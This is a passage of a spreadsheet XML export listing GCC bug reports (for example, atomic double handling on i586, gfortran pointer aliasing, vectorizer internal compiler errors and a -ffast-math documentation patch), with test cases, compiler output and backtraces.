These testcases used to work in 4.4.0.</t>
  </si>
  <si>
    <t>GCC-71245</t>
  </si>
  <si>
    <t>std::atomic load/store bounces the data to the stack using fild/fistp</t>
  </si>
  <si>
    <t>Same result with gcc 4.8 gcc5 and gcc6.1.  Didn't test exhaustively.
#include 
std::atomic d(5.0)
void foo_d(void) {
  d =  d + 1.0
  // d+=1.0     // unimplemented
}
with gcc6.1 -m32 -O3 -march=i586 (https://godbolt.org/g/w3VKpG) this compiles to
foo_d():
        subl    $20 %esp       #
        fildq   d     #                # 
        fistpq  (%esp)      # %sfp     # copy `d`'s bits to the stack (with no loss)
        fldl    (%esp)  # %sfp
        fadds   .LC0  #
        fstpl   (%esp)        # %sfp   # store d + 1.0 to the stack
        fildq   (%esp)        # %sfp   # 
        fistpq  d   #                  # atomic store using fild
        lock orl        $0 (%esp)     ## mfence equivalent
        addl    $20 %esp       #
        ret
I assume fild/fistp is gcc's trick for implementing atomic loads and stores without resorting to cmpxchg8b.  Clever since 80bit float can't munge the data.  The fild/fistp pairs are of course not necessary in this case where the data is already 64bit float.  The function should just fld / fstp to  d  directly.
With -march=i486 or lower gcc correctly doesn't assume that 64bit FP loads/stores are atomic so it calls a library function to do the atomic load and store.  With SSE or SSE2 available it uses an SSE load/store to copy to the stack.  
With -msse2 and -mfpmath=sse we finally load/store directly from/to d with movq / addsd / movq.  movq vs. movsd shouldn't make a performance difference I think.
--------
We don't need to allocate any stack space.  We could implement the StoreLoad barrier with  lock or $0 -4(%esp) instead of reserving extra stack to avoid doing it to our return address (which would introduce extra store-forwarding delay before the ret could eventually retire).</t>
  </si>
  <si>
    <t>GCC-23373</t>
  </si>
  <si>
    <t>[4.0 only] Functions returning pointers with pointer argument</t>
  </si>
  <si>
    <t>There is a bad case of aliasing here:
$ cat pointer_function.f90
program Realloc
  IMPLICIT NONE
  REAL DIMENSION(:) POINTER :: x
  INTEGER :: i
  x =&gt; NULL()
  x =&gt; myallocate(x)
contains
  FUNCTION myallocate(p)
    REAL DIMENSION(:) POINTER :: p myallocate
    INTEGER :: noldierr
    if (associated(p)) then
       print *p is associated
    else
       print *p is not associated
    end if
    allocate(myallocate(20))
    if (associated(p)) then
       print *p is associated
    else
       print *p is not associated
    end if
  END FUNCTION myallocate
end program Realloc
$ gfortran -fdump-tree-original pointer_function.f90
$ ./a.out
 p is not associated
 p is associated
$ tail -10 pointer_function.f90.t02.original
{
  struct array1_real4 x
  static void myallocate (struct array1_real4 
  x.data = 0B
  x.data = 0B
  myallocate (
}
The two arguments to myallocate are bogus - they alias each other
and they shouldn't.  A tempoaray array descriptor is needed here.</t>
  </si>
  <si>
    <t>GCC-18636</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware broken building newlib/libm/common/s_fmax.c</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Tue Nov 23 20:48:44 UTC 2004 I get:
/gcc/xgcc -B/home/hp/combined/mmixware-sim/gcc/ -nostdinc
-B/home/hp/combined/mmixware-sim/mmix-knuth-mmixware/gnuabi/newlib/ -isystem
/home/hp/combined/mmixware-sim/mmix-knuth-mmixware/gnuabi/newlib/targ-include
-isystem /home/hp/combined/combined/newlib/libc/include
-B/usr/local/mmix-knuth-mmixware/bin/ -B/usr/local/mmix-knuth-mmixware/lib/
-isystem /usr/local/mmix-knuth-mmixware/include -isystem
/usr/local/mmix-knuth-mmixware/sys-include -L/home/hp/combined/mmixware-sim/ld 
-mabi=gnu -DPACKAGE=\newlib\ -DVERSION=\1.12.0\  -I.
-I/home/hp/combined/combined/newlib/libm/common  -O2 -DCOMPACT_CTYPE
-fno-builtin    -O2 -g -O2  -O2 -g -O2  -mabi=gnu -c
/home/hp/combined/combined/newlib/libm/common/s_fmax.c
/home/hp/combined/combined/newlib/libm/common/s_fmax.c: In function 'fmax':
/home/hp/combined/combined/newlib/libm/common/s_fmax.c:25: error: MMIX Internal:
Trying to output invalidly reversed condition:
(gt (reg:CC_FP 252 $252 [282])
    (const_int 0 [0x0]))
/home/hp/combined/combined/newlib/libm/common/s_fmax.c:25: internal compiler
error: in mmix_output_condition at config/mmix/mmix\
.c:2782
Last known to work with: Tue Nov 23 17:37:12 UTC 2004.</t>
  </si>
  <si>
    <t>GCC-12612</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE when using log function with -O3 -ffast-math</t>
  </si>
  <si>
    <t>gcc version 3.4 20031014 (experimental) crashes with an ICE when
compiling the attached code with -O3 -ffast-math:
~/data/planck/LevelS/Sampler&gt;g++ -v -c -O3 -ffast-math sampler.ii
Reading specs from /afs/mpa/data/martin/ugcc/lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: /scratch/gcc/configure --prefix=/afs/mpa/data/martin/ugcc
--enable-languages=c++ --disable-checking
Thread model: posix
gcc version 3.4 20031014 (experimental)
 /afs/mpa/data/martin/ugcc/libexec/gcc/i686-pc-linux-gnu/3.4/cc1plus
-fpreprocessed sampler.ii -quiet -dumpbase sampler.ii -mtune=pentiumpro -auxbase
sampler -O3 -version -ffast-math -o /tmp/ccycYGAB.s
GNU C++ version 3.4 20031014 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.4 20031014 (experimental).
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=63442
sampler.cc: In function `int main(int char**)':
sampler.cc:192: error: unrecognizable insn:
(insn:HI 6444 6442 6445 619 (parallel [
            (set (reg:DF 2256)
                (unspec:DF [
                        (reg:DF 2263)
                        (reg:XF 5025)
                    ] 66))
            (clobber (reg:XF 5412))
        ]) -1 (insn_list 6442 (nil))
    (expr_list:REG_DEAD (reg:DF 2263)
        (expr_list:REG_UNUSED (reg:XF 5412)
            (expr_list:REG_EQUAL (unspec:DF [
                        (reg:DF 2263)
                        (reg:XF 2264)
                    ] 66)
                (nil)))))
sampler.cc:192: internal compiler error: in extract_insn at recog.c:2064
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The bug appears to be relatively new it didn't trigger about two weeks ago.
Sorry for the long testcase I currently don't have time to reduce it.</t>
  </si>
  <si>
    <t>GCC-17340</t>
  </si>
  <si>
    <t>[4.0 Regression] Internal error compiling with -O3</t>
  </si>
  <si>
    <t>This program compiles fine without optimization.
alpha1:PD&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown
alpha1:PD&gt;g++ -v
Reading specs from /usr/local/lib/gcc/alphaev56-unknown-linux-gnu/3.5.0/specs
Configured with: ../gcc/configure --verbose --enable-languages=c++
Thread model: posix
gcc version 3.5.0 20040207 (experimental)
Configured:
alpha1:PD&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++
--disable-nls &gt;clog 2&gt;&amp;1'
Built:
alpha1:PD&gt;alias BUILD
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\''-O'\'' LIBCFLAGS='\''-g
-O'\'' LIBCXXFLAGS='\''-g -O'\'' bootstrap &gt;log 2&gt;&amp;1'
alpha1:testsuite&gt;/usr/local/bin/g++ -c -O3 -DNDEBUG     
-D__USE_STRING_INLINES=1 -pedantic-errors -Werror -ansi -fno-common
-fstrict-aliasing -Wall -Wold-style-cast -Wsign-promo -Wpointer-arith
-Wconversion -Wundef -Wwrite-strings -Winvalid-pch -Woverloaded-virtual
-Wcast-qual -finline-limit=5000 -Wextra -MMD      -fimplicit-templates -I. -I..
--save-temps -o test025.o test025.cc
g++: Internal error: Killed (program cc1plus)
Please submit a full bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-2108</t>
  </si>
  <si>
    <t>[parser]parse error on legal code.</t>
  </si>
  <si>
    <t>The following code gets a parse error at the . token.
struct c1 { c1(int) }
struct c2 { 
  c2()  
  int method() const
}
void tst()
{
  c1( c2().method() )
}
Release:
gcc version 2.95.2 19991024 (release)  also code sourcery 3.0 snapshot 20010226
Environment:
i586-pc-linux
How-To-Repeat:
g++ -c tst.cpp</t>
  </si>
  <si>
    <t>jamie</t>
  </si>
  <si>
    <t>GCC-59626</t>
  </si>
  <si>
    <t>[4.8 Regression] /usr/include/bits/unistd.h:173:1: error: inlining failed in call to always_inline 'readlinkat': recursive inlining</t>
  </si>
  <si>
    <t>Coreutils-8.22 program 'cp' cannot be compiled with trunk gcc 4.9.0 with -O2 -ggdb -pipe -flto:
CCLD     src/cp
/usr/include/bits/unistd.h: In function 'careadlinkat.constprop':
/usr/include/bits/unistd.h:173:1: error: inlining failed in call to always_inline 'readlinkat': recursive inlining
 __NTH (readlinkat (int __fd const char *__restrict __path
 ^
/usr/include/bits/unistd.h:185:3: error: called from here
   return __readlinkat_alias (__fd __path __buf __len)
   ^
make[3]: *** [/var/tmp/portage/sys-apps/coreutils-8.22/temp/ccoTpm79.ltrans9.ltrans.o] Error 1
make[3]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.0-alpha20131228/../../../../x86_64-pc-linux-gnu/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
Makefile:5419: recipe for target 'src/cp' failed
Gcc-4.8.2 fails with -flto too:
CCLD     src/cp
/usr/include/bits/unistd.h: In function 'careadlinkat.constprop.21':
/usr/include/bits/unistd.h:173:1: error: inlining failed in call to always_inline 'readlinkat': recursive inlining
 __NTH (readlinkat (int __fd const char *__restrict __path
 ^
/usr/include/bits/unistd.h:185:3: error: called from here
   return __readlinkat_alias (__fd __path __buf __len)
   ^
make[3]: *** [/var/tmp/portage/sys-apps/coreutils-8.22/temp/cctZ031y.ltrans8.ltrans.o] Error 1
make[3]: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.2/../../../../x86_64-pc-linux-gnu/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
Makefile:5419: recipe for target 'src/cp' failed
Both versions are fine without -flto.</t>
  </si>
  <si>
    <t>GCC-34884</t>
  </si>
  <si>
    <t>[4.3 Regression] gfortran.dg/array_constructor_9.f90</t>
  </si>
  <si>
    <t>On Linux/Intel64 I got
FAIL: gfortran.dg/array_constructor_9.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
with revision 131671. Revision 131622 is OK.</t>
  </si>
  <si>
    <t>GCC-78178</t>
  </si>
  <si>
    <t>ICE in WHERE statement with diagnostic</t>
  </si>
  <si>
    <t>This is a spin-off from PR 65944.
As noted by Dominique in https://gcc.gnu.org/ml/fortran/2016-11/msg00002.html 
gfc_match_simple_where also has an issue with not setting the locus
correctly.  Test case:
! { dg-do compile }
! { dg-options -Wcharacter-truncation }
subroutine where_ice (ij)
  implicit none
  character(8)  :: y(10102)
  integer       :: i
  integer       :: j
  character(12) :: txt(5)
  if (.true.) where (txt(1:3) /= ''   )  y(1:3ij) = txt(1:3) ! { dg-warning CHARACTER expression will be truncated }
end subroutine where_ice
Problem is that the obvious and simple fix
Index: match.c
===================================================================
--- match.c     (Revision 241745)
+++ match.c     (Arbeitskopie)
@@ -62196 +62197 @@ match_simple_where (void)
   c-&gt;next = XCNEW (gfc_code)
   *c-&gt;next = new_st
+  c-&gt;next-&gt;loc = gfc_current_locus
   gfc_clear_new_st ()
   new_st.op = EXEC_WHERE
leads to lots of regressions:
ig25@linux-fd1f:~/Krempel/Where&gt; gfortran actual_array_offset_1.f90 
f951: internal compiler error: Segmentation fault
0xc2695f crash_signal
        ../../trunk/gcc/toplev.c:338
0x6f0ba6 resolve_select_type
        ../../trunk/gcc/fortran/resolve.c:8768
0x6e719c gfc_resolve_code(gfc_code* gfc_namespace*)
        ../../trunk/gcc/fortran/resolve.c:11045
0x6e94a7 resolve_codes
        ../../trunk/gcc/fortran/resolve.c:16025
0x6e93ee resolve_codes
        ../../trunk/gcc/fortran/resolve.c:16010
0x6e956e gfc_resolve(gfc_namespace*)
        ../../trunk/gcc/fortran/resolve.c:16060
0x6d3ff2 gfc_parse_file()
        ../../trunk/gcc/fortran/parse.c:6092
0x717902 gfc_be_parse_file
        ../../trunk/gcc/fortran/f95-lang.c:198
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
What on earth is going on there I don't know.  I think I will
build from a clean tree and retry and in the meantime fix
PR 65944 on the other branches.</t>
  </si>
  <si>
    <t>GCC-14737</t>
  </si>
  <si>
    <t>Purge political statement from -ffast-math docs</t>
  </si>
  <si>
    <t>I object to the missionary use of the term should never be 
turned on by any -O option in the description of -ffast-math. 
Here is a patch that removes this and also documents what 
this flag is there for: 
------------------------ 
Index: invoke.texi 
=================================================================== 
RCS file: /cvsroot/gcc/gcc/gcc/doc/invoke.texiv 
retrieving revision 1.390.2.22 
diff -c -r1.390.2.22 invoke.texi 
*** invoke.texi 15 Mar 2004 21:15:33 -0000      1.390.2.22 
--- invoke.texi 25 Mar 2004 23:31:33 -0000 
*************** 
*** 43954404 **** 
  This option causes the preprocessor macro @code{__FAST_MATH__} to be 
defined. 
! This option should never be turned on by any @option{-O} option since 
  it can result in incorrect output for programs which depend on 
  an exact implementation of IEEE or ISO rules/specifications for 
! math functions. 
  @item -fno-math-errno 
  @opindex fno-math-errno 
--- 43954405 ---- 
  This option causes the preprocessor macro @code{__FAST_MATH__} to be 
defined. 
! This option is not turned on by any @option{-O} option since 
  it can result in incorrect output for programs which depend on 
  an exact implementation of IEEE or ISO rules/specifications for 
! math functions. It may however yield faster code for programs that do  
! not require the guarantees of these specifications. 
  @item -fno-math-errno 
  @opindex fno-math-errno 
ChangeLog entry: 
2004-03-25  Wolfgang Bangerth   
	* doc/invoke.texi (optimization options): Reword description 
	  of -ffast-math. Document its primary purpose.</t>
  </si>
  <si>
    <t>GCC-59822</t>
  </si>
  <si>
    <t>[4.9 Regression] ice in compute_live_loop_exits with -O3</t>
  </si>
  <si>
    <t>I just tried to bootstrap trunk revision 206619 on an x86_64 Linux box.
Configure line is
../src/trunk/configure --prefix=/home/dcb/gcc/results 
    --enable-checking=yes --enable-languages=cc++fortran --disable-werror
In the generated Makefile I changed BOOT_CFLAGS from
-g -O2 to -g -O3.
I got
../../src/trunk/gcc/config/i386/i386.c: In function â€˜rtx_def* ix86_build_const_vector(machine_mode bool rtx)â€™:
../../src/trunk/gcc/config/i386/i386.c:18746:1: internal compiler error: in compute_live_loop_exits at tree-ssa-loop-manip.c:237
 ix86_build_const_vector (enum machine_mode mode bool vect rtx value)
 ^
0xe978e5 compute_live_loop_exits
    ../../src/trunk/gcc/tree-ssa-loop-manip.c:237
0xe97cf8 add_exit_phis_var
    ../../src/trunk/gcc/tree-ssa-loop-manip.c:324
0xe97dfc add_exit_phis
    ../../src/trunk/gcc/tree-ssa-loop-manip.c:346
0xe9847b rewrite_into_loop_closed_ssa(bitmap_head* unsigned int)
    ../../src/trunk/gcc/tree-ssa-loop-manip.c:540
0xf9f9bf vectorize_loops()
    ../../src/trunk/gcc/tree-vectorizer.c:579
0xeac556 tree_loop_vectorize
    ../../src/trunk/gcc/tree-ssa-loop.c:154
0xeac5e0 execute
    ../../src/trunk/gcc/tree-ssa-loop.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Interestingly when I dropped BOOT_CLAGS back to -g -O2 the bootstrap
worked.</t>
  </si>
  <si>
    <t>GCC-48275</t>
  </si>
  <si>
    <t>getter=namespace failing with .mm</t>
  </si>
  <si>
    <t>gcc fails to compile when using objc++ and having getter=namespace.
I don't have the latest revision of the trunk so someone should verify it is still there or not.
$ cat test.h
@interface Test
{
        int ns
}
@property (getter=namespace) int ns
@end
$ cat gccbug.mm
#import test.h
$ gcc-4.6 -lobjc -o test gccbug.mm
In file included from gccbug.mm:1:0:
test.h:5:19: error: expected identifier before Ã¢namespaceÃ¢
test.h:5:19: error: expected Ã¢)Ã¢ before Ã¢namespaceÃ¢</t>
  </si>
  <si>
    <t>jos</t>
  </si>
  <si>
    <t>GCC-54451</t>
  </si>
  <si>
    <t>c++11/random.cc build failure when _GLIBCXX_USE_C99_STDINT_TR1 is not defined in config.h</t>
  </si>
  <si>
    <t>When _GLIBCXX_USE_C99_STDINT_TR1 defined in config.h neither of bits/random.h and bits/random.tcc gets included and as result c++11/random.cc does not compile:
random.cc:72:3: error: 'random_device' has not been declared
Noticed that when trying to build recent SVN version as Linux to DJGPP cross-compiler. Tested versions 2012-08-30 and later.
Commenting out '#ifdef _GLIBCXX_USE_C99_STDINT_TR1' fixed build problem but I'm not sure that it is correct solution.</t>
  </si>
  <si>
    <t>GCC-7686</t>
  </si>
  <si>
    <t>template compilation failure on unused method</t>
  </si>
  <si>
    <t>C++ does not instantiate a member function for a template
class unless the member function is actually used.  If the 
member function is not instantiated the compiler does not 
check the member function (or rather this particular 
instantiation) for compilation errors.
So in the code example that follows although the second
form of foo foo(T t) would obviously not compile for
A since it is never called A::foo(void t) is
never instantiated and in the past this has not caused
any problems with compilation.
This assumes that the rule for an uninstantiated member 
function extends to its declaration.  I am not certain
whether the C++ standard is clear on this point.
This compiles and runs without difficulties on gcc 2.95.2.
However it fails to compile for gcc 3.0.4 (with the error
message:  In instantiation of `A': invalid parameter
type `void' in declaration `void A::foo(T)'
Release:
gcc version 3.0.4
Environment:
SUNWUltra-60
SunOS 5.8
How-To-Repeat:
// Compile this code:
#include 
using namespace std
template 
class A {
public:
   void foo()
   {
      cout &lt;&lt; Calling foo() &lt;&lt; endl
   }
   void foo(T t)
   {
      cout &lt;&lt; Calling foo(T) &lt;&lt; endl
   }
}
int main()
{
   A a  // Just to show that it works normally
   a.foo()
   a.foo(3)
   A b  // This instantiation compiles with 2.95.2
               // but not with 3.0.4
   b.foo()
}</t>
  </si>
  <si>
    <t>leick.robinson</t>
  </si>
  <si>
    <t>GCC-54051</t>
  </si>
  <si>
    <t>[4.7 Regression] Invalid alignment specifier generated for vld3_lane_* and vld3_dup_* intrinsics.</t>
  </si>
  <si>
    <t>#include 
int32_t a __attribute__ ((aligned (64)))
int32x2x3_t test (void)
{
  return vld3_dup_s32 (
}
int32x2x3_t test1 (void)
{
  int32x2x3_t res 
  return vld3_lane_s32 (
}
/tmp/ccdQ3KCr.s: Assembler messages:
/tmp/ccdQ3KCr.s:24: Error: can't use alignment with this instruction -- `vld3.32 {d16[]d17[]d18[]}[r3:64]'
/tmp/ccdQ3KCr.s:50: Error: can't use alignment with this instruction -- `vld3.32 {d16[1]d17[1]d18[1]}[r3:64]'
This can be traced to the use of the Alignment specifiers in the appropriate patterns and that needs to be fixed up.</t>
  </si>
  <si>
    <t>GCC-66677</t>
  </si>
  <si>
    <t>[6 Regression] ICE: in vect_transform_stmt at tree-vect-stmts.c:7626</t>
  </si>
  <si>
    <t>I get the following Firefox build failure during final LTO libxul link: 
/home/trippels/gecko-dev/media/libyuv/source/convert.cc: In function â€˜X420ToI420â€™:
/home/trippels/gecko-dev/media/libyuv/source/convert.cc:239:12: internal compiler error: in vect_transform_stmt at tree-vect-stmts.c:7626
 static int X420ToI420(const uint8* src_y
            ^
0x10a07937 vect_transform_stmt(gimple_statement_base* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
        ../../gcc/gcc/tree-vect-stmts.c:7625
0x10a2a167 vect_schedule_slp_instance
        ../../gcc/gcc/tree-vect-slp.c:3453
0x10a29ee3 vect_schedule_slp_instance
        ../../gcc/gcc/tree-vect-slp.c:3334
0x10a2a967 vect_schedule_slp(_loop_vec_info* _bb_vec_info*)
        ../../gcc/gcc/tree-vect-slp.c:3523
0x10a0babb vect_transform_loop(_loop_vec_info*)
        ../../gcc/gcc/tree-vect-loop.c:6223
0x10a2fc8f vectorize_loops()
        ../../gcc/gcc/tree-vectorizer.c:516
0x10916b5b execute
        ../../gcc/gcc/tree-ssa-loop.c:286
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
I will try to come up with a testcase later.</t>
  </si>
  <si>
    <t>GCC-2887</t>
  </si>
  <si>
    <t>-frepo failure snapshot 20010507</t>
  </si>
  <si>
    <t>g++ fails to correctly instanciate template using the default
instanciation mechanism (-frepo).
Nota Bene: snapshot 20000911 (experimental version 2.96)
fixed this problem that showed up again since. This 
experimental release correctly instanciated templates on
linux &amp; aix targets.
Release:
gcc version 3.0 20010507 (prerelease)
Environment:
i686-pc-linux-gnu Linux 2.2.17
(same thing happens on aix4.3.3)
How-To-Repeat:
g++ -frepo -c tryg++.cc
g++ tryg++.o
Here is the output for snapshot 20010507:
=========================================
collect: recompiling tryg++.cc
collect: relinking
collect: recompiling tryg++.cc
collect: relinking
collect: recompiling tryg++.cc
collect: relinking
tryg++.o: In function `std::deque &gt;::~deque()':
tryg++.o(.gnu.linkonce.t._ZNSt5dequeIPK6TNCellSaIS2_EED1Ev+0x48): undefined reference to `std::_Deque_base &gt;::~_Deque_base()'
collect2: ld returned 1 exit status
Here is the output with snapshot 20000911:
==========================================
/u/nobili/work/branchsort/testg++
linux5&gt;g++ -frepo -c tryg++.cc 
linux5&gt;g++  tryg++.o            
collect: recompiling tryg++.cc
collect: relinking
collect: recompiling tryg++.cc
collect: relinking</t>
  </si>
  <si>
    <t>pnobili</t>
  </si>
  <si>
    <t>GCC-52044</t>
  </si>
  <si>
    <t>[OOP] Invalid memory access with ALLOCATE default initializer and polymorphic array components</t>
  </si>
  <si>
    <t>This is a follow up to PR 51972 - or rather it's included test case.
The following program fails at run time with a segfault cf:
  Conditional jump or move depends on uninitialised value(s)
    at 0x400932: __copy_MAIN___T (nb54af.f90:6)
    by 0x400B96: MAIN__ (nb54af.f90:11)
From the dump:
  two.a._data.data = (void * restrict) __builtin_malloc (96)
  D.1899 = (struct t[0:] * restrict) two.a._data.data
  D.1903 = *two.a._vptr-&gt;_def_init
  two.a._vptr-&gt;_copy (&amp;D.1903
                      D.1899 + ((S.2 + D.1900) * two.a._vptr-&gt;_size))
Thus there is a MEMSET '\0' CALLOC or two.a._data.data = 0 missing as _copy checks the value of the dst argument.
Probably there is an issue with checking for component-&gt;attr.allocatable while on only has CLASS_DATA (component)-&gt;attr.allocatable. I assume that attr.alloc_comp is correctly set but the nullification is missed when iterating over the components. Or there is no nullification with _def_init?
  type t
    integer allocatable :: x(:)
  end type t
  type t2
    class(t) allocatable :: a(:)
  end type t2
  type(t2) :: two
  allocate (two%a(2)) ! ICE: SEGFAULT
end</t>
  </si>
  <si>
    <t>GCC-46674</t>
  </si>
  <si>
    <t>[4.6 Regression] Weak alias is mistakenly optimized away</t>
  </si>
  <si>
    <t>Created attachment 22537
The test case
This patch
http://gcc.gnu.org/ml/gcc-patches/2010-10/msg02275.html
causes a failure when building glibc for arm-none-linux-gnueabi target. The reduced test case is attached.
Without this patch memchr is defined in the assembly:
    .size    __memchr .-__memchr
    .weak   __GI_memchr
    .hidden __GI_memchr
    .set    __GI_memchr__memchr
    .global memchr
    .set    memchr__GI_memchr
    .ident    GCC: (GNU) 4.6.0 20101026 (experimental)
but with this patch memchr is not defined:
    .size    __memchr .-__memchr
    .weak    __GI_memchr
    .hidden    __GI_memchr
    .set    __GI_memchr__memchr
    .ident    GCC: (GNU) 4.6.0 20101026 (experimental)
When compiling the test case -O is used on the command line.</t>
  </si>
  <si>
    <t>jiez</t>
  </si>
  <si>
    <t>GCC-36399</t>
  </si>
  <si>
    <t>ABI bug on darwin/x86-32</t>
  </si>
  <si>
    <t>This testcase:
#include 
__m128i r(__m128 d1 __m128 d2 __m128 d3 __m128i r int t __m128i s) {return r+s}
compiles to:
_r:
	subl	$12 %esp
	movdqa	%xmm3 %xmm0
	paddq	32(%esp) %xmm0
	addl	$12 %esp
	ret
with apple gcc 4.0 and 4.2.
It compiles to this with FSF 4.2:
_r:
	subl	$12 %esp
	movdqa	48(%esp) %xmm0
	paddq	16(%esp) %xmm0
	addl	$12 %esp
	ret
Since apple GCC defines the ABI on darwin this is an FSF GCC ABI bug for that platform.</t>
  </si>
  <si>
    <t>GCC-23138</t>
  </si>
  <si>
    <t>[mingw32] real(16) values are printed incorrectly</t>
  </si>
  <si>
    <t>Hi all 
I'd like to report what looks like a bug in 
gfortran for Windows version: 
GNU F95 version 4.1.0 20050702 (experimental) (i686-pc-mingw32)
It concerns values of type real which both print and add 
incorrectly. 
To give an example take this little program: 
------------------------------------------------
program realtrouble
   real :: x
   integer :: i
   x=1.0
   i=5
   write(**) x==x    ! Prints 0.0 instead of 1.0 !!! 
   write(**) x==1.0  ! Prints 0.0 too !!! 
   write(**) i==i    ! Prints 5 as expected
end program realtrouble
------------------------------------------------------
Apart from incorrect results of write()ing: when summing 
several values of type real adding 0.0 to 0.0 yielded 2.0 
adding another 0.0 to 2.0 yielded 0.0 again! 
I've compiled and linked the program at the command-line 
under Windows XP with no particular flags simply like this: 
    gfortran gftest.f95
Here's what a verbose execution produced: 
Driving: gfortran gftest.f95 -v -lgfortranbegin -lgfortran
Using built-in specs.
Target: i686-pc-mingw32
Configured with: ../gcc/configure --prefix=/mingw --enable-languages=cf95
Thread model: win32
gcc version 4.1.0 20050702 (experimental)
 c:/gfortran/bin/../libexec/gcc/i686-pc-mingw32/4.1.0/f951.exe gftest.f95 -
quiet -dumpbase gftest.f9
5 -mtune=pentiumpro -auxbase gftest -version -o C:\DOKUME~1\Tillmann\LOKALE~1
\Temp/ccWqbaaa.s
GNU F95 version 4.1.0 20050702 (experimental) (i686-pc-mingw32)
        compiled by GNU C version 3.4.4 (mingw special).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -o C:\DOKUME~1\Tillmann\LOKALE~1\Temp/ccIHcaaa.o C:\DOKUME~1
\Tillmann\LOKALE~1\Temp/ccWqbaaa.s
 c:/gfortran/bin/../libexec/gcc/i686-pc-mingw32/4.1.0/collect2.exe -Bdynamic 
C:/fortran/g95/lib/crt2
.o -Lc:/gfortran/bin/../lib/gcc/i686-pc-mingw32/4.1.0 -
Lc:/gfortran/bin/../lib/gcc -LC:/fortran/g95/
lib -Lc:/gfortran/bin/../lib/gcc/i686-pc-mingw32/4.1.0/../../.. C:\DOKUME~1
\Tillmann\LOKALE~1\Temp/c
cIHcaaa.o -lgfortranbegin -lgfortran -lmingw32 -lgcc -lmoldname -lmingwex -
lmsvcrt -luser32 -lkernel
32 -ladvapi32 -lshell32 -lmingw32 -lgcc -lmoldname -lmingwex -lmsvcrt
--------------------------------------
I've exchanged mails with Steven Kargl who suggested to 
produce a .original-file using flag -fdump-tree-original. 
This generated the following: 
MAIN__ ()
{
  real4 x
  int4 i
  x = 1.0e+0
  i = 5
  _gfortran_filename = gftest.f95
  _gfortran_line = 8
  _gfortran_ioparm.unit = 6
  _gfortran_ioparm.list_format = 1
  _gfortran_st_write ()
  _gfortran_transfer_character (x== 3)
  _gfortran_transfer_real (
  _gfortran_st_write_done ()
  _gfortran_filename = gftest.f95
  _gfortran_line = 9
  _gfortran_ioparm.unit = 6
  _gfortran_ioparm.list_format = 1
  _gfortran_st_write ()
  _gfortran_transfer_character (x== 3)
  {
    real4 C.473 = 1.0e+0
    _gfortran_transfer_real (
  }
  _gfortran_st_write_done ()
  _gfortran_filename = gftest.f95
  _gfortran_line = 10
  _gfortran_ioparm.unit = 6
  _gfortran_ioparm.list_format = 1
  _gfortran_st_write ()
  _gfortran_transfer_character (i== 3)
  _gfortran_transfer_integer (
  _gfortran_st_write_done ()
}
------------------------------------ 
Steve's preliminary conclusion is (quote):
(...).original shows that the gfortran frontend is
doing the right thing.  This is a gfortran library problem
or an interface with OS library problem. 
Kind regards 
   Tillmann Wegst</t>
  </si>
  <si>
    <t>post</t>
  </si>
  <si>
    <t>GCC-1338</t>
  </si>
  <si>
    <t>StreamTokenizer does not handle /* comments correctly</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: osk@hem.passagen.se
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: java.io/313: StreamTokenizer does not handle /* comments correctly
Date: Wed 9 Aug 2000 12:41:30 -0700 (PDT)
 I'm putting this test case into Mauve.
 Thanks
 Tom
</t>
  </si>
  <si>
    <t>GCC-6913</t>
  </si>
  <si>
    <t xml:space="preserve"> totally broken?</t>
  </si>
  <si>
    <t>A definition for __c_file_type seems to be entirely missing!
Errors:
--------
In file included from /usr/local/include/g++-v3/fstream:48
                 from foo.cpp:1:
/usr/local/include/g++-v3/bits/basic_file.h:52: parse error before `{' token
/usr/local/include/g++-v3/bits/basic_file.h:57: virtual outside class 
   declaration
/usr/local/include/g++-v3/bits/basic_file.h:57: function `int std::overflow(int 
   = -1)' is initialized like a variable
/usr/local/include/g++-v3/bits/basic_file.h:60: virtual outside class 
   declaration
/usr/local/include/g++-v3/bits/basic_file.h:60: function `int std::underflow()' 
   is initialized like a variable
/usr/local/include/g++-v3/bits/basic_file.h:63: virtual outside class 
   declaration
/usr/local/include/g++-v3/bits/basic_file.h:63: function `int std::uflow()' is 
   initialized like a variable
/usr/local/include/g++-v3/bits/basic_file.h:66: virtual outside class 
   declaration
/usr/local/include/g++-v3/bits/basic_file.h:66: function `int 
...
Release:
unknown
Environment:
Linux/Cygwin
How-To-Repeat:
Compile this program:
--------
#include 
int main() { return 0 }</t>
  </si>
  <si>
    <t>GCC-58858</t>
  </si>
  <si>
    <t>gfortran.dg/assumed_type_8.f90 fails</t>
  </si>
  <si>
    <t>The patches for two different issues of PR 58793 clash:
The test case gfortran.dg/assumed_type_8.f90 added with r203945 fails with the patch r203915 but not without. When both patches are applied the error is:
program test
            1
Internal Error at (1):
Invalid expression in gfc_element_size.
Paul if you have time: Can you have a look?</t>
  </si>
  <si>
    <t>GCC-48443</t>
  </si>
  <si>
